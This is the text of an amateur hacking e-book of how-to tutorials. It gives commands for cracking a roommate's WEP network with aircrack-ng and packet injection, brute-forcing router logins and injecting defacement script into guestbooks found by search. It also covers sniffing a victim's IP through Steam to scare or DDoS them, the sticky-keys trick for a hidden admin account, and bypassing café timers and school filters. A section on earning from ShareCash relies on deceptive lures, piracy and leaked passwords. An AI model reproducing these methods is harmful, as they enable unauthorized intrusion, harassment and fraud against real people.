POWER OF HACKING BOOK 6

Page 1

Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 1


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 2


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 3


Power Of Hacking速

How to change your folders background Step 1: Have the Folder you want to put the background on open! Step 2: Open up Notepad, then simply paste in this code: [{BE098140-A513-11D0-A3A4-00C04FD706EC}] iconarea_image=***Picture Location Here!***\***Name of File!*** Step 3: Go to ur picture (the picture you want to use!) and right click and select properties and find the file location for example lets say my file is in "my hardrive" it would be located at "C:\\" understand? copy the location! Step 4: Now go back to ur text document (notepad) and where it says ***Picture Location Here!*** paste the location...u copied in the previus step! Step 5: Now after u've done that where it says ***Name of File!*** type the name of the file including the .jpg .bmp .bip. jpeg etc Step 6: Save the text document as "desktop.ini" be sure to remember the .ini extension! click Save as "All Files" not "Text Document" and save the document in the folder where u want the background to be! Now just close the folder and open it again it should show the picture as a

Mail:mtahirzahid@yahoo.com

Page 4


Power Of Hacking速 background!

Chat with Friends through ms dos Command Prompt :1) All you need is your friend's IP Address and your Command Prompt. 2) Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A 3) Now save this as "Messenger.Bat". 4) Open Command Prompt. 5) Drag this file (.bat file) over to Command Prompt and press Enter.

Mail:mtahirzahid@yahoo.com

Page 5


Power Of Hacking速 6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter You will see something like this:

8) Now all you need to do is type your message and press Enter. Start Chatting.......!

How To Close Ports So i've been looking for a while on just how to close a port on a computer. I simply couldn't find a way. Well, i finally found it. This'll only work for windows users (unless your unix version OS has netsh). it's actually quite simple. here's the command for it: netsh firewall delete portopening TCP portnumber

Mail:mtahirzahid@yahoo.com

Page 6


Power Of Hacking速 it's that simple. Simply go to START -> RUN -> and type in that command up there, and it'll close it for you. or, you can also open up command prompt (START -> RUN -> CMD) and type in "netsh" without the quotes to get to your windows firewall settings. however, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's automatically runable. as well as a batch script. so here you are fellas: .VBS Script set ss = createobject("wscript.shell") set ws = wscript dim PORT PORT = InputBox("Enter the port you wish to close:") ss.run "netsh.exe" ws.sleep 1000 ss.sendkeys "firewall delete portopening TCP " & PORT ss.sendkeys "{enter}" ws.sleep 500 'ss.sendkeys "exit" 'ss.sendkeys "{enter}" .BAT Script @echo off title Port Closer echo Port Closer echo. set /p port=Type the port number you wish to close here: netsh firewall delete portopening TCP %port% msg /w * Port %port% has been closed. Mail:mtahirzahid@yahoo.com

Page 7


Power Of Hacking速 Exit How To Crack A Router For Username and Password (I will be using Brutus to crack a tp-Link route.) 1.When we want to access our router,it will be password protected.We can try the default username and password.

As you can see,it is password protected.

Mail:mtahirzahid@yahoo.com

Page 8


Power Of Hacking速 2.I will open up my Brutus.

3.Configure Brutus.Put the target as the router's IP address.Put in the userlist and the passlist.After everything is OK,press on START. As you can see from the picture above, Brutus is cracking the router. 4.Wait for Brutus to finish cracking the router.You will get this result.

How to Crack a WEP Encrypted Wireless Network on Windows Vista Mail:mtahirzahid@yahoo.com

Page 9


Power Of Hacking速 First you can only use this method to crack a WEP encrypted network. WEP has been replaced by WPA encryption which is stronger but can still be cracked, just not as easily. To find out if the network you want to crack is WEP encryption, simply view the wireless networks in the Connect to a network box and hold your mouse over the network of choice. A little box will tell you the encryption. If it say WEP - good we can proceed, if it says anything else this tutorial wont help. First to understand what you will be doing. You will be using a program to capture packets and then use another program to analyze those packets and crack the key, thus allowing you to have access to their network. To capture packets (data from the network we are trying to crack) you must have the program running on your computer and you must capture about 200 000 or more IV packets (a special type of packet). I will show you how to capture the correct type of packets. Also ONLY certain types of wireless cards can actually capture wireless packets. In order to capture packets your wireless card must be able to go into monitor mode, not every driver or every wireless card supports monitor mode. In most cases you will have to download a special driver designed for your wireless card to put it into monitor mode. I had to purchase a new wireless card because mine was not supported. The program you will be using has a list of supported wireless cards and comes with the drivers needed (Lucky you) Ok, down to business. First the program you need to capture packets can be downloaded from this link http://www.tamos.com/download/main/ca.php Next the program to analyze the packets and finger out the password can be downloaded from my own site. I got it to work for windows vista and then zipped it all into a folder for you. To get this to run all you have to do is extract it, open the aircrack folder, then open the bin folder, then double click on Aircrack-ng GUI.exe. Here is the download linkhttp://www.howtovideos.ca/images/aircrackVista.rar just Mail:mtahirzahid@yahoo.com

Page 10


Power Of HackingŽ click it and save the file. Now for the dirty work, keep in mind this could take a few days to capture enough packets. First install the Commview for Wifi program. You do this by extracting the setup file from the file we downloaded earlier (ca6.zip) Then double click setup.exe and follow the prompts. When Commview opens for the first time it has a driver installations guide. This replaces the old driver with a newer, better, and more improved version! Hooray. Follow the prompts to install your new driver and now we are ready to capture. If everything has gone as planned when you open Commview for Wifi the little play button in the top left corner will be blue. If it is not blue the driver has not been installed properly. Moving on‌ Click the blue button in the top left corner and then click Start Scanning. Commview for Wifi now starts scanning each channel looking for data that is being sent. It will list each network it finds. Now click each host until you find the name of the network key you are trying to find. Now select the appropriate channel (my network is broadcasting on channel 6 so I will start capturing all data on channel 6) Click capture. Commview for Wifi is now capturing all the packets being sent over channel 6. Once Commview for Wifi collects enough packets aircrack can analyze them and crack the wireless key. The thing is, you only need certain packets, and if you collect too many unneeded packets aircrack may get confused. To help make things easier follow the next few steps. First of all we only want packets from one host, not all of them. As you can see from my screenshot below I am collecting packets from 7 different network. (see screenshot below)A few are WPA encrypted so they and a few are WEP. I really only want to collect data being sent from one network, so in order to do this all you have to do is right click on the wireless network you want to crack and select copy mac Mail:mtahirzahid@yahoo.com

Page 11


Power Of HackingŽ address. Now click on the rules tab. On the left side under simple rules click MAC Addresses. For action select Capture, and for Add Record select both. Now click inside the entry form box and hit ctrl+v (to paste the mac address) or right click and select paste. Now hit add MAC Address. What we just did is make a rule so that Commview for Wifi will only capture packets coming from a certain MAC Address (the one we want) Great almost done. Now to make things even easier for Aircrack you only want to capture DATA packets. There are 3 types to select from Management packets, Data Packets and Control Packets. We only want Data packets because that is where the information is that Aircrack needs to crack the wireless encryption passkey. Simply select the D, and unselect the M and the C. Now Commview for Wifi is only capturing Data Packets. To be more specific Commview for Wifi is only capturing Data Packets to and from a specific MAC address. Now that everything is set up to capture the right types of packets we should start saving the logs. You have to save all of the packets into a log for Aircrack to analyze them. You can set Commview for Wifi to save them automatically, or just save them yourself periodically. It is a good idea to have them auto save because it splits them into nicely sized logs, and if you accidentally close Commview for Wifi they will save and you wont lose all your packets! To do that just go to the logging tab and enable auto saving. You can change the settings if you would like (I recommend increasing the maximum directory size to something like 100000). And now we wait‌ We have to capture over 15000 IV packets. Because we set up some rules most of the packets we capture will be IV packets (these are a certain type of Data packet with information used to crack the wireless key). It took me Mail:mtahirzahid@yahoo.com

Page 12


Power Of Hacking® about 4 days to capture enough packets, but I was not running Commview for Wifi non stop. If you are close to the network and there is heavy traffic, it may only take you a few hours. Ok what do you do now? Alright, so now 20000 packets (or more) later we are ready to crack the WEP wireless key. First lets converts all of the log files to .cap format (shown in screenshot below) When I cracked my first WEP key with this method I had 4 log files and about 220 000 packets.Go to wherever you have your log files saved and double click to open it. Now click on file -> Export Logs -> Tcpdump Format Save it as 1.cap do the rest of your logs, saving them in sequential order 1.cap, 2.cap, 3.cap etc. Now that you have all of your log files saved in .cap format lets open Aircrack. Open the aircrack folder (wherever you extracted it) then open the Bin folder, now double click Aircrack-ng GUI.exe. Aircrack will open, click the choose button and navigate to where you have your log files saved. To select all of your log files ( saved in .cap format) Hold down CTRL and click each file, Then hit open. Now click launch, Aircrack shows you all of the different BSSID’s that it captured data from and assigns an index number to each one, then it asks you Index number of target network? You want to enter the number of the network you want to crack. Mine is called CrackMePlease so I am selecting 15. Enter the index number and then press enter, if you have enough IV’s then it should give you the WEP key. If not go back and capture more and try again. How To Crack WEP In Linux Im using Ubutnu 8.10, but all the commands are compatible with all other Linux Distros. 1. Open terminal Sudo -s (Enter Password) Mail:mtahirzahid@yahoo.com

Page 13


Power Of Hacking速 apt-get install aircrack-ng (Here shows lots of cool shenanigans in verbose mood, just enjoy) Note: it might prompt you with something like "this file will take 8995kb.. do u wish to install [Y/N]" (Correct Answer Being Y for yes) Alright, you have just installed aircrack-ng on your computer, congratulations! 2. Ifconfig wlan0 down this command puts your wireless card into "monitor mode." if this line doesnt work for you, try "ifconfig ath0 down" or the connection type you are using. im going to continue using wlan0 as that applies to me, you will just replace wlan0 with your specific device code. OR iwconfig wlan0 mode monitor if neither of the above work for you. once again, depends on your computer. 3. Your goal now is to find your target, my goal is my roommates wireless router which is using WEP encryption, how convenient! first, for educational purposes, type airodump-ng into terminal, this shows all the commands airodump is capable of, very important if you want to go after something a tad different or specific

Mail:mtahirzahid@yahoo.com

Page 14


Power Of Hacking速 We want to find the target, type airodump-ng --showack wlan0

We see that the target Essid is "Rob and Big" the encryption type is WEP, the BSSID number is "00:22:15:23:6E:E2", and finally the channel number is 11 you must know the enemy well if you want to hack it successfully. know that we know all this very important information, we shall begin our attack! airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0 holy shnap! that was alot!, here is what we just did. -w ->saves all the important stuff to a file (first being the file name) --showack ->shows some cool information, idk, i like it just cause its always changing, not really necessary --berlin 3000 -> keeps the cool numbers on the screen even longer, like i said, not totally important, but defiantly looks cool! (3000 being the time the numbers are kept on the screen) --bssid ->defines to the program what bssid (the router) you want to specifically capture packets from

Mail:mtahirzahid@yahoo.com

Page 15


Power Of Hacking速 -C -> Defines what channel the program to stay on (instead of surfing all 12, it just monitors one now) wow! amazing, tons of cool numbers pop up and entertain us! whooo hooo! what is actually happening is that the program is capturing packets and saving them to the file you defined above (First) so break out a can of chef boyardee and chow away, cause its going to be awhile. You are actually wanting for the number under #Data at the time to reach ~ 10000 to 100000, the more data is being transfered over the network, the faster this will go. --Dude! that number is not going up very fast / or, very very very slow! Skip to the bottom, i will explain and how to 'fix that' -Fantastic! you have ~ 10000 packets and a full stomach, what now? you have all this information, now you need to decipher it (more commonly know as 'cracking') KEEP THE AIRODUMP-NG TERMINAL OPEN! open a new terminal and type sudo -s (enter password) aircrack-ng -a 1 -b 00:22:15:23:6E:E2 First.cab Cool! what did i just do? aircrack-ng -> cracking program, can crack WEP and WPA passcodes -a -> Set the attack mode to WEP (2 is WPA) -b -> is the network we are attacking (the bssid is 00:22:15:23:6E:E2) First.cab -> the file airodump saved all the important shenagians to. (note, the Mail:mtahirzahid@yahoo.com

Page 16


Power Of Hacking速 program automatically saves the file as *.cab file) wait.. wait.. wait.. BAM! the password! Congratulations, you have just won the game. or plz collect 5000 more packets, (this is why you left airodump-ng open.) aircrack-ng will automatically re-attempt to crack again after airodump-ng has collected 5000 more packets. so more chef boyardee, and some more patience... --#Data is going slooowwwwwwwww!!! HELP ME! this is because the user is not actively using the network, you have a choice, wait till he starts using the network again or 'assist' the network on giving you the packets you need. now, this is going to be quite a hassel, but stick with it. apt-get install macchanger stop the airodump-ng from working. (i just hit ctrl+c and it stops) ifconfig wlan0 down >> the top half of the screen of the terminal of the airodump tell you the network you are gathering packets for, the bottom half lists mac addresses. important! with the picture above, im going to use the mac address 00:22:3F:7B:D5:2C so, macchanger -m 00:22:3F:7B:D5:2C wlan0 Now, your mac address is the same as a computer already accepted by the router! oooo... awwwww.. now, we get to play with a program called aireplay-ng! aireplay-ng -3 -b 00:22:15:23:6E:E2 -h 00:22:3F:7B:D5:2C wlan0 Mail:mtahirzahid@yahoo.com

Page 17


Power Of Hacking速 -What just happened? aireplay-ng works buy injecting packets into the router so u get more traffic btwn the computers. (speeds up the packet retrieval on the airodump-ng side) -3 is the attack type '00:22:3F:7B:D5:2C' i just explained what i did above -b is the enemy bssid '00:22:15:23:6E:E2' -h is your spoofed (faked) mac addresss '00:22:3F:7B:D5:2C' now, it will start injecting packets.. now start up airodump again and wait some more! airodump-ng -w First --showack --berlin 3000 --bssid 00:22:15:23:6E:E2 -C 11 wlan0 (just in case you lost it) WOW! that, is how to crack a WEP key. i hoped you enjoyed this tut. How To ''Deface'' A Guestbook With HTML-Injection Go to google and search: guestbook.asp When you find a guestbook, send in this as a comment: < --- Inizio codice --- > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <BODY bgColor=#000000>. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hacked By Your_nick</title> <script>alert("Hacked By Your_nick - Italian Hackers")</script> <style type="text/css"> <!-.style1 { Mail:mtahirzahid@yahoo.com

Page 18


Power Of Hacking速 font-size: 36px; font-family: Arial, Helvetica, sans-serif; color: #00FF00; } .style2 {font-size: 18px; font-family: Arial, Helvetica, sans-serif; color: #ffffff; } .style3 {font-size: 36px; font-family: Arial, Helvetica, sans-serif; color: #000000; font-weight: bold; } --> </style> </head> <body> <center><p class="style1"><img src="http://www.baywoodracquetclub.com/images/warning.jpg" width="301" height="268"></p> </center> <p align="center" class="style1"><strong>This Web Site contains bug HaCkEd By Your_Nick - Italian Hackers </strong></p> <p align="center" class="style3"><img src="http://www.scuolepistoia.it/lsssalutati/Immagini/Formazione/Progetto %20SOU%20(Spazio%20Orientamento%20Universitario).gif" width="204" height="153"></p> <p class="style1"> </p> <p class="style1"> </p> <p align="center" class="style2"><b>Site HaCkEd By Your_Nick</b></p> Mail:mtahirzahid@yahoo.com

Page 19


Power Of Hacking速 <p class="style1"> </p> <p class="style1">  </p> </body> </html> < ---- Fine codice --- > Dominating ShareCash! ShareCash is a site much like Uploading.com as it allows you to upload files and then pays you as you get others to download your files. The difference between ShareCash and other sites is that ShareCash will pay A LOT more. ShareCash pays 300 to 600 dollars for every 1,000 downloads, where Uploading.com pays around 5 dollars for every 1,000 downloads. What I am going to show you right now is how you can grab a hold of ShareCash and make AT LEAST 50 dollars a day from it! So first if you have not yet done so, Click www.sharecash.org and sign up for an account. There is no fee to sign up and it takes a few minutes to do so. Now you should familiarize yourself with the site so take a good 5 minutes or so to look around. Note the Upload button on the side, that is where you will go to Upload your files. THE METHODS! Now I have spent some serious time developing these methods and making them work. Some are quick and easy and will bring some good cash while others will take more time, but will bring unbelievable cash! Method 1: Youtube This is an easy way to get started. People will download anything from youtube. So to get started make sure you have an account with youtube. Next go over to daily motion and find a good strip tease video where the girl gets naked at some point in the video. Download the video from daily motion using www.keepvid.com and fire up windows movie maker. The idea is that we want to post the video up to the point where it becomes Mail:mtahirzahid@yahoo.com

Page 20


Power Of HackingŽ obvious that the girl is about to show off some skin (boobs or bottom half) and then we cut the video right there. Now what your going to do is upload the cut portion to youtube. Since there is no actual nudity in this video (since you cut it out) youtube will not take the video down. Upload the entire video to sharecash and put the link in the description box next to your video. Give the video a long sexy name and watch as people download the entire video from your link in order to see the girl naked! Tons of people search for girls on Youtube so your videos will get plenty of views very fast. Method 2: Orkut and Myspace method Signup to yahoo and myspace account. Make around 300-400 friends on them. It will take little bit of time but you can do it easily if you spend around 1 hour daily on that and add around 50 persons a day. Its not so easy but its not even so hard. I got around 500 friends within two weeks. Most important thing: Concentrate only of UK, US and Canada people because sharecash only pays for these countries signups. It would be much easier for you if you join US and UK communities. If you are comfortable then try to make your profile by a girl抯 name. Mostly people add a girl more commonly than a guy. After creating a ID with 400-500 friends. Add your uploaded pic in your profile or update status. For example: Create a notepad file. Clock it with your sharecash link and add in your profile. Encourage peoples to download your file by saying that this is your phone number, coolest or sexiest pic of yours, or be wilder like this is my nude cam show download it. There will be many hornies there

Mail:mtahirzahid@yahoo.com

Page 21


Power Of Hacking速 to download your stuff. Update your profile daily and keep on adding more US and UK friends. Method 3: Forums are your friend! Ahh yes forums my favorite place to get downloads from. So what we're gonna do for this method is find any porm forum and copy a few porm passwords that people post up. If you just look around at a few places like http://forum.dumpstersluts.com/ you'll find a few passwords. Now go ahead and copy those passwords into a text document and archive it with winrar. Here's where we're going to do things a little differently. Most people will go and outright post these files on the forums with your download link. Now this will bring in a few bucks, but when the passwords run out or someone sees a few postings about how they already use these passwords, your thread is pretty much dead. Instead your going to sign up to as many porm forums as you can and place your download link in your signatur with anchor text such as \"Free GangBros Passwords.\" Then just post all over the place saying things like \"Wow nice video\" or \"Thanks for the videos\" stuff like that so people will see your name and signature. If the forum will not allow your download link in the signature just make a free blogger blog with the download link on there and have your signature redirect them there with the same achor text. You will see huge traffic with this method, trust me everyone wants free porm passwords! Method 4: Roms and Emulators This is my biggest money maker by far, and its actually pretty easy to set up. The only reason that this is the most advanced method is because it requires a few things such as a website, hosting and some experience in creating a website and making it look decent. If you can make this method happen you will see a huge amount of downloads come through. What you do is search for nintendo ds roms and emulators in google. Now when you find a good site just download as many as you can. I use a few sites to download ds

Mail:mtahirzahid@yahoo.com

Page 22


Power Of Hacking速 roms, but starting up I just went to mininova and downloaded a huge file with like 100+ ds roms. This got my site off the ground much faster and took the hassle out of downloading a 100 or so files seperately. Just upload all the files to sharecash seperately and post them on your new website. If you keep your site updated with new releases you can get a couple thousand downloads in a day easy. If you submit your site to any of the top 100 Rom lists you can get some awesome traffic that way. Altermatively you can submit to digg and reddit claiming that you've found the best DS Rom site on the web. Just remember to put a disclaimer on your site stating that all roms downloaded need to be deleted within 24 hours unless the legal copy is owned. That statement will keep your rom site legal so dont forget it! Method 5: Digital Comics Digital Comics are very popular on the web currently, and no one is using sharecash to promote online comics. There are a few things you can do here. For one you can visit http://www.lorencollins.net/freecomic/ and download a few comics and then post them on a blogger blog. Of course digg traffic works well here since comics usually cost money to download online. Another way to explode this is to use a site called 4chan.org. Now what you do is visit the comic section pick a comic book you downloaded and post the front cover and then next to that post the download link. A small description will help with this and get a couple people commenting on it. Again everyone loves free comics and 4chan is a great place to get your comics downloaded. Method 6: Exploit Lazyness This is probably my favorite method just because its actually very creative. What you need to do is go to any manual traffic exchange (look on google you'll find a ton) and sign up to a few. Upload a large picture or any small program that is about 1 to 2 megs in size and name it \"Traffic Exchange Bot.\" Make a quick blogger blog and delete everything from the page except for the post and title. Make The title large and the body easy to read. State Mail:mtahirzahid@yahoo.com

Page 23


Power Of Hacking速 that you have a free traffic exchange bot that they can have to use for the traffic exchange they are on. You can customize the page and make one for each traffic exchange you use. People will download the file hoping for a bot, even if you dont have a bot for them to download once they download the file and see that its not a bot they will more than likely just move on with their traffic exchanging while you just got a download out of it! Make sure you .rar the file that you upload so it appears believable. You can participate in the exchange to get credits or just buy some, either way you will get conversions easily since everyone hates having to do manual traffic exchanges. Method 7: Current Blackhat Niche Method: Micha el Jackson of course! Download a dramatic looking picture of Michael Jackson (A close up of his face or whatever) and edit the photo by placing a caption of a quote and his life span (1958-2009 or whatever). Throw up a blogger blog saying everyone should pray for Michael Jackson and download this picture and put it as their background for their computer. There are way to many nuts out there for this not to work! Put a link to it on digg and reddit with a title saying something like \"Support Michael Jackson's family, download this picture and place it as your background. Pictures honoring the king of pop\" Just remember to make your title as long as possible and you'll be fine! Method8: Take help of websites or blogs It was the simplest method and yet most reliable method. If you have a good website which got around 1K-2K visitors per day then create a simple banner and clock it with your sharecash URL. Try to give free ebooks related to your niche. Peoples just love free stuffs. For getting free ebook or something you can simply search on google, rewrite the whole content and then go. If Mail:mtahirzahid@yahoo.com

Page 24


Power Of HackingŽ you want to be bully then simply copy paste that method and give it for free. Ask your friends to place your free stuff clocked banner of URL to place on their websites or blogs. Method9: Make your website or blog especially for sharecash People just love free stuffs. When you are start getting some decent money from sharecash, just invest in buying a domain and hosting and make website dedicated to downloading free stuffs. SEO it regularly or to improve traffic always do yahoo answers posting along with link back to your website. Just don抰 spam them otherwise you will be punished. Conclusion That's all for Sharecash Domination I hope you enjoyed this report, now get out there and make it happen! With these methods it'll be hard to not make $50+ a day unless you just dont take action! So nows the time to take action! How to get IP's through the Steam Client Step 1: Download the programs CommView: http://www.tamos.com/bitrix/redirect.php? event1=download&event2=commview&event3=cv6&goto=/files/cv6.zip "The tool used to sniff the IP through the Steam Client" Steam Client: http://storefront.steampowered.com/download/SteamInstall.msi "If you don't have this you probably shouldn't even be doing this" Step 2: Installation Pretty self explanatory to be honest. Just install the Steam Client and CommView (Two idiot proof installations) Step 3: Getting the IP Right click your Steam Client window at the bottom right of your screen and click Mail:mtahirzahid@yahoo.com

Page 25


Power Of Hacking速 "Friends". Pick a friend who's IP you want. Now, Open CommView. At the top you should see a little start sign. Click it. Now just send a random message to your victim and start voice chat. Now a bunch of IP's will show up on CommView. If Voice Chat is running you'll see the IN's and OUT's on CommView will be rising through the roof. That is the ip. Right click it and click Copy, then click Remote IP Address. Step 4: Using that information Now the easy part. Go to http://www.ip-adress.com/ip_tracer/ and put in the IP address of your victim. Now you can either scare the shit out of him with that information or DDoS him/her. Be Creative :) How to get passes to pormsites Disclaimer: Please be of age (18) to view porn and/or try this exploit. With this tutorial you can get much passes(famous sites) like: Banos,Bazers,reaykings,nautyamerica etc etc. Download mIRC here: http://www.mirc.com/get.html

Mail:mtahirzahid@yahoo.com

Page 26


Power Of Hacking速 Start mIRC you will get this screen:

Full name: Put a name that you want(hasbullah is not my name) Email address: Put in a spam email that is not yours(people search emails through mIRC to spam your inbox) Nickname: Choose a nice nickname that you want Alternative: Choose a second nickname if yours is already chosen and online by a other person.

Mail:mtahirzahid@yahoo.com

Page 27


Power Of Hacking速 After go to the option Servers and choose add

Fill in this details: Description: Porn channel(or whatever you like. Irc server: Irc.Whatnet.org Ports:6667 Group: Nothing Password: Nothing After adding you will see the server under your choosen description(mine Irc.Whatnet.Org) Double click it then you will come back to the main screen and press there Connect to Server You will get this notification: * Connecting to irc.whatnet.org (6667) -irc.whatnet.org- *** Looking up your hostname -irc.whatnet.org- *** Checking Ident Mail:mtahirzahid@yahoo.com

Page 28


Power Of Hacking速

-irc.whatnet.org- *** Found your hostname And after this screen will pop-up Fill in at Enter a Channel Name and click join:

Mail:mtahirzahid@yahoo.com

Page 29


Power Of Hacking® 3x After joining you will get in a channel:

Click the XSS3,1 or 2 if you got in it will tell you this: Welcome to #3x. Welcome to #3x. Search here for your pass before requesting in main. Go slow: BOT ABUSE WILL GET YOU BANNED If you got that message you are in the right room Type: !search …… your site like: !search realitykings Then the bot will automatically respond to you with a pass. How to get past your school blocking system without programs Right, first off, you need to go onto: http://g.ho.st/ This is a virtual machine/ computer that your sysadmins shouldn't have blocked. At my school, our security is pretty high because of people like me and you. After you Mail:mtahirzahid@yahoo.com

Page 30


Power Of Hacking速 are on the website, it should look like this:

Ok, now you click on the big button that says: Start. Then, after that, you should see another screen that looks like this:

Now make an account, you should see the register button. I have made an account, (trust me, it is easy). After you have logged in, you should see another screen that Mail:mtahirzahid@yahoo.com

Page 31


Power Of HackingÂŽ looks something like this:

After you have got logged in, you should try and get on the g.ho.st internet (alpha), to get on the internet, follow these commands. on the desktop, click on the icon that says: find cool web stuff. Then click the icon that says: Web. Now go to: Ghost services. And there should be a icon that says: G.ho.st browser (alpha). (If you go on a website, and it says: open in a new tab because this site will function better, (or something like that) don't do it. But if you want to, just do it). How to get unlimited time in Internet CafĂŠ's Today we're going to learn how to disable the timer on the computers in Internet Cafe's. Let's go through the steps, shall we? 1. Create a New Text Document. 2. Then type CMD in it.

Mail:mtahirzahid@yahoo.com

Page 32


Power Of Hacking® 3. And then save it as anything.bat (Make sure the file do NOT end on .txt, but on .bat) 4. Go to the location were you saved the .bat file and run it. If you've done this correctly, you'll see that Command Prompt is open. 5. Now that Command Prompt is open, type in: cd\windows (This will change the directory to Windows) 6. Then type in: regedit (This will get you to the registry editor gui) 7. Now navigate to: HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current version>internet settings>policies>system 8. Then on the right pane where it says Disable Taskmanager, right click on it, and scroll down to modify, and than change the value of it to "0". 9. And then open Windows Task Manager (CTRL+ALT+DELETE) 10. And then disable the Internet Cafe's timer. If you did this right, then you're done! Well done :D How to grab IP address with PHP Today I’ll be showing you how to grab somebodies IP address when they visit a page. The variable to use is $_SERVER['REMOTE_ADDR'] - It’s that simple. You can use it for just about anything, here are a few examples. Printing the Users IP Address: <?php print ($_SERVER['REMOTE_ADDR'], "I'm Watching You!"); ?> Printing it to a File: Mail:mtahirzahid@yahoo.com

Page 33


Power Of Hacking® <?php $ip = $_SERVER['REMOTE_ADDR']; $handle = fopen('ipaddresses.txt'', 'a+); fwrite($handle, $ip); fwrite($handle, "\n"); fclose($handle); ?> All you have to do, is to make a text file and insert any of these codes or one of your own and save it as anythingyouwant.php Then upload it to your website and it'll do the trick :P The Possibilities for what you can use this to are endless. How To Hack An Administrator Account With A Guest Account (The only way this is going to work is if your account has permission to mody files in folder «system32») Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows.. Interested ? read on… Concept Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account. Mail:mtahirzahid@yahoo.com

Page 34


Power Of Hacking速 Prerequisites Guest account with write access to system 32.

Here is how to do that C:/windows/system32

* Go to

* Copy cmd.exe and paste it on desktop * rename cmd.exe to sethc.exe * Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes. When asked to overwrite, overwrite the sethc.exe. * Now Log out from your guest account and at the user select window,press shift key 5 times. * Instead of Sticky Key confirmation dialog,command prompt with full administrator

Mail:mtahirzahid@yahoo.com

Page 35


Power Of Hacking®

privileges will open. Press shift key 5 times and command prompt will open. * Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter. * You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password. * Congrats You have hacked admin from guest account. Further.. Also, you can further create a new user at the command prompt by typing “NET USER Ephemeral /ADD” where “Ephemeral” is the username you would like to add with administrator privileges. Then hide your newly created admin account by Go to registry editor and navigate to this key [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :) NetBIOS Hacking

Mail:mtahirzahid@yahoo.com

Page 36


Power Of Hacking® -What is it?NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers. -How can this be of use to me?Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal. -What do I need?Windows OS Cain and Abel (oxid.it - Home) ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ -[Step 1, Finding the target.]++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab,

Mail:mtahirzahid@yahoo.com

Page 37


Power Of Hacking® click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then

Mail:mtahirzahid@yahoo.com

Page 38


Power Of Hacking®

click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up. Now remember the IP address of the computer you are going to be breaking into. If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.

Mail:mtahirzahid@yahoo.com

Page 39


Power Of HackingÂŽ During the next step we will begin our trial and error.

++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ -[Part 2, Trial and Error]++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN. If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on. Click on the start menu and go to run, type in cmd, and click ok. This should bring up the command prompt. From here we will do most of the hacking. Mail:mtahirzahid@yahoo.com

Page 40


Power Of Hacking® Now I will be referring to certain commands that need to be inputted into the command prompt. I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt. I am only doing this to avoid confusion. Let’s get back to the hacking. Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.” This will tell us if the target is online. If it worked, it will look something like this (note, I have colored out private information):

IF it didn’t work, meaning that the target is not online, it will look something like this:

Mail:mtahirzahid@yahoo.com

Page 41


Power Of Hacking®

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed. ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ -[Part 3, Gathering the Information.]++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++ ++++++++++++++++++ ++++++++ Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.” This will show us if there is file sharing enabled, and if there is, it will give us the:

Mail:mtahirzahid@yahoo.com

Page 42


Power Of Hacking® currently logged on user, workgroup, and computer name.

